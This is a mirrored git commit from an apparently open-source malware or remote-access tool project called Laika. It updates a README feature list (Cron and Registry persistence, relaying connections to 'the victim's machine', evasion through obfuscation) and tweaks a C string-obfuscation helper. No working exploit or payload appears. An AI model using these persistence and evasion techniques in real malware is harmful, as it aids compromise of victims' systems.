1
0
mirror of https://github.com/CPunch/Laika.git synced 2024-11-21 12:40:04 +00:00

update README

This commit is contained in:
CPunch 2022-05-09 17:02:48 -05:00
parent b190f5dd16
commit 062d8f1dd6
2 changed files with 2 additions and 3 deletions

View File

@ -18,7 +18,7 @@ Some notable features thus far:
- [X] Persistence via Cron on Linux-based systems.
- [X] Persistence via Windows Registry.
- [ ] Ability to relay socket connections to/from the victim's machine.
- [ ] Uses obfuscation techniques also seen in the wild (string obfuscation, tiny VMs executing sensitive operations, etc.)
- [X] Uses obfuscation techniques also seen in the wild (string obfuscation, tiny VMs executing sensitive operations, etc.)
- [ ] Simple configuration using CMake:
- [X] Setting keypairs (`-DLAIKA_PUBKEY=? -DLAIKA_PRIVKEY=?`, etc.)
- [ ] Obfuscation modes

View File

@ -45,7 +45,7 @@ void addPadding(uint8_t *data, int start) {
}
}
uint8_t *makeSKIDdata(char *data, int sz, uint8_t *buff, int key) {
void makeSKIDdata(char *data, int sz, uint8_t *buff, int key) {
int i;
for (i = 0; i < sz; i++)
@ -53,7 +53,6 @@ uint8_t *makeSKIDdata(char *data, int sz, uint8_t *buff, int key) {
buff[i++] = key; /* add the null terminator */
addPadding(buff, i);
return buff;
}
#define MAKESKIDDATA(macro) \